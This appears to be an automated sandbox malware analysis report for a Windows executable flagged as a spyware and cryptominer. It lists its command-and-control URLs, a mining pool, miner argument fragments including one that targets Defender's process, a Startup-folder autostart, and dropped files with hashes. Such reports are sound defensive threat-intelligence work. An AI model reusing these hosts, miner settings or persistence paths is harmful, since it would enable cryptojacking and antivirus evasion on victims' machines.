                                            https://woo097878781.win/66/api/endpoint.phpdsexplorer.exe, 00000015.00000002.2907055074.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://woo097878781.winZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9E71000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D019E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/P.txteC:explorer.exe, 00000015.00000002.2909218782.0000000003830000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-explorer.exe, 00000015.00000002.2907055074.0000000001306000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/P.txtTEMexplorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/66/api/endpoint.phpEZexplorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/mgravell/protobuf-netiZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.U~powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://stackoverflow.com/q/11564914/23354;ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://stackoverflow.com/q/2152978/23354ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://woo097878781.win/66/api/endpoint.phptjalvjhtgxjbffgqexplorer.exe, 00000015.00000003.1436229581.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://woo097878781.win/P.txtC:explorer.exe, 00000015.00000003.2056823251.0000000003910000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2056823251.0000000003900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2909218782.0000000003900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://woo097878781.win/P.txt--cinit-kill-targets=msmpeng.exeexplorer.exe, 00000015.00000002.2907055074.0000000001306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000008.00000002.1408857314.0000022246BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.cpowershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.m:Bpowershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1408857314.0000022246BA1000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D019E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://woo097878781.win/66/api/endpoint.php$explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.0000000001386000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.microsoft.Ypowershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                5.188.137.200
                                                                		pool.hashvault.proRussian Federation
                                                                		50340SELECTEL-MSKRUfalse
                                                                185.157.162.216
                                                                		unknownSweden
                                                                		197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                154.216.20.243
                                                                		woo097878781.winSeychelles
                                                                		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1576051
                                                                Start date and time:2024-12-16 13:40:03 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 44s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:36
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:ZppxPm0ASs.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:3c104350cc2661c345673e91ed672c4c.exe
                                                                Detection:MAL
                                                                Classification:mal100.spyw.expl.evad.mine.winEXE@38/9@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 40%
                                                                HCA Information:
                                                                • Successful, ratio: 59%
                                                                • Number of executed functions: 106
                                                                • Number of non-executed functions: 8
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target RegAsm.exe, PID 7872 because there are no executed function
                                                                • Execution Graph export aborted for target RegAsm.exe, PID 8188 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7880 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: ZppxPm0ASs.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                07:41:10API Interceptor18x Sleep call for process: powershell.exe modified
                                                                07:41:15API Interceptor2x Sleep call for process: RegAsm.exe modified
                                                                13:41:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                5.188.137.200file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                    file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                      file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                        nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                          185.157.162.216file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                    file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                        154.216.20.243file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                                  SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                        file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            pool.hashvault.profile.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 37.203.243.102
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 37.203.243.102
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 37.203.243.102
                                                                                                            file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 37.203.243.102
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 37.203.243.102
                                                                                                            xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            woo097878781.winfile.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 154.216.20.243
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 154.216.20.243

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            SELECTEL-MSKRUTRC.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 185.47.206.100
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 5.188.137.200
                                                                                                            nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 5.188.137.200
                                                                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                            • 95.213.205.83
                                                                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                            • 95.213.205.83
                                                                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                            • 95.213.205.83
                                                                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                            • 95.213.205.83
                                                                                                            SKHT-ASShenzhenKatherineHengTechnologyInformationCoRUN.VBS.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.18.89
                                                                                                            arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.230.19.168
                                                                                                            h.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.18.69
                                                                                                            invoice.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.18.89
                                                                                                            Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 154.216.17.190
                                                                                                            1734335488857ad04f18b89ed443298ec4ba194986b75012687d1a4e65fb772a035ff002b3927.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                            • 154.216.17.204
                                                                                                            17343353665dbf331bb34348160d07a40652276a18d932b7a75cefa9161a74f0bd5e08d97f649.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 154.216.17.204
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 154.216.20.243
                                                                                                            arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 154.211.34.28
                                                                                                            Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                            • 154.216.16.83
                                                                                                            OBE-EUROPEObenetworkEuropeSEfile.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 185.157.162.216
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 185.157.162.216
                                                                                                            secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                            • 185.157.162.126
                                                                                                            Slf.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                            • 185.157.162.126
                                                                                                            LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                            • 185.157.162.126

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 154.216.20.243
                                                                                                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                            • 154.216.20.243
                                                                                                            rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                            • 154.216.20.243
                                                                                                            invoice.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.20.243
                                                                                                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 154.216.20.243
                                                                                                            https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 154.216.20.243
                                                                                                            NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.20.243
                                                                                                            InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 154.216.20.243
                                                                                                            A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                            • 154.216.20.243
                                                                                                            KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                            • 154.216.20.243

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sysfile.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              feZvV3DCj8.exeGet hashmaliciousXmrigBrowse
                                                                                                                services64.exeGet hashmaliciousXmrigBrowse
                                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                                                          5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            6R0yrvM8Hk.exeGet hashmaliciousXmrigBrowse
                                                                                                                              file.exeGet hashmaliciousXmrigBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e................................................@..........

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agufqnc2.poy.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahbf2o1f.sdq.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enk5vv2g.npz.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kboxrfz3.wtz.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):14544
                                                                                                                                Entropy (8bit):6.2660301556221185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: feZvV3DCj8.exe, Detection: malicious, Browse
                                                                                                                                • Filename: services64.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 5EZLEXDveC.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 6R0yrvM8Hk.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\IsStopped.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\ZppxPm0ASs.exe
                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):89640
                                                                                                                                Entropy (8bit):6.349551184218018
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:07Se/hE9pxIN1e8Lf0HbqH5D62np/cvarqWjc6Tpzz:07thEvmuf7E5DP/TqWjBpn
                                                                                                                                MD5:3C104350CC2661C345673E91ED672C4C
                                                                                                                                SHA1:D205E94D47949CF3BC3F5226978F6D370C3D3B94
                                                                                                                                SHA-256:1FB9F279263C252A09F12B69C7238C18D2325F7CF7250EBE24AD9149ABE62CF4
